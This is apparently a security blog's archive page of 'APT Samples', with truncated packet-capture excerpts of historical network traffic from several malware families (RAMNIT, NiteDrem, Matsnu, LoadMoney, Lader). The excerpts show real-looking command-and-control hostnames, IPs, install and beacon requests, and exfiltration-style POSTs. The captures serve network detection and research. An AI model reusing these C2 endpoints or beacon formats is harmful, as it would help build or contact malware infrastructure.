Category Archives: APT Samples

APT – Advanced Persistent Threat – RAMNIT – Historical Traffic Sample

2011-07-29 23:09:35.899406 IP 68.87.73.246.53 > 172.29.0.116.1026: 23951 1/0/0 A 207.223.0.140 (50) E@.N..@.9…DWI….t.5…:..]…………star-trakers.com………………… 2011-07-29 23:09:35.899748 IP 172.29.0.116.1488 > 207.223.0.140.443: Flags [S], seq 867836568, win 64240, options [mss 1460,nop,nop,sackOK], length 0 E..0*.@…S,…t……..3.”…..p….T………. 2011-07-29 23:09:38.820452 IP 172.29.0.116.1488 > 207.223.0.140.443: Flags [S], seq 867836568, win 64240, options [mss 1460,nop,nop,sackOK], length 0 E..0*.@…S+…t……..3.”…..p….T………. 2011-07-29 23:09:44.728939 IP 172.29.0.116.1488 > 207.223.0.140.443: Flags… Read More »

Share Button

APT – Advanced Persistent Threat – NiteDrem – Historical Traffic Sample

2013-08-19 13:49:42.584965 IP 172.16.148.184.1034 > 103.20.193.157.99: Flags [P.], seq 1:148, ack 1, win 65535, length 147 E….#@………g…. .c.yII:…P…….GET /down.asp?action=install&u=cpmcpm&p=2366A64BAA384EA6AB9CEF73E8E2BE12&t=7393 HTTP/1.1 User-Agent: fucking Host: bucks.onepiecedream.com:99     2013-08-19 13:49:42.628555 IP 103.20.193.157.99 > 172.16.148.184.1034: Flags [.], ack 148, win 8760, length 0 E..(….?..Bg……..c. :….yI.P.”8.^.. 2013-08-19 13:49:42.890363 IP 103.20.193.157.99 > 172.16.148.184.1034: Flags [P.], seq 1:245, ack 148, win… Read More »

Share Button

APT – Advanced Persistent Threat – MatsnuMBRWiping – Historical Traffic Sample

2013-02-03 20:32:35.365905 IP 172.16.253.132.1046 > 46.165.248.117.80: Flags [P.], seq 1:316, ack 1, win 64240, length 315 E..c.+@…(……..u…P..R…..P….<..GET /inbox.php?ltype=ld&ccr=1&id=E81B90884C4C45445458&stat=0&ver=2000803&loc=0x0409&os=Windows%20XP HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914) Host: nvufvwieg.com Connection: Keep-Alive Cache-Control: no-cache     2013-02-03 20:32:35.366029 IP 46.165.248.117.80 > 172.16.253.132.1046: Flags [.], ack 316, win 64240, length 0 E..(……~1…u…..P……..S=P………….… Read More »

Share Button

APT – Advanced Persistent Threat – LoadMoney – Historical Traffic Sample

1970-01-01 -4:-59:-43.2109 IP 10.0.2.15.1049 > 78.140.165.153.80: Flags [P.], seq 1:100, ack 1, win 64240, length 99 E….Q@….. …N……P7…….P…^M…GET /get_xml?file_id=25227372 HTTP/1.1 Accept: */* User-Agent: tiny-dl/nix Host: takeinfo.ru     1970-01-01 -4:-59:-43.2110 IP 78.140.165.153.80 > 10.0.2.15.1049: Flags [.], ack 100, win 65535, length 0 E..(….@.z.N… ….P……7..!P……. 1970-01-01 -4:-59:-43.2490 IP 78.140.165.153.80 > 10.0.2.15.1049: Flags [.], seq 1:1421, ack… Read More »

Share Button

APT – Advanced Persistent Threat – Lader Downloader – Historical Traffic Sample

2013-09-20 07:23:02.590312 IP 172.16.98.8.1034 > 174.140.169.145.80: Flags [P.], seq 1:408, ack 1, win 65535, length 407 E….#@…….b…… .P023.%…P… …POST /forum/viewtopic.php HTTP/1.0 Host: louvozza.com Accept: */* Accept-Encoding: identity, *;q=0 Accept-Language: en-US Content-Length: 275 Content-Type: application/octet-stream Connection: close Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR… Read More »

Share Button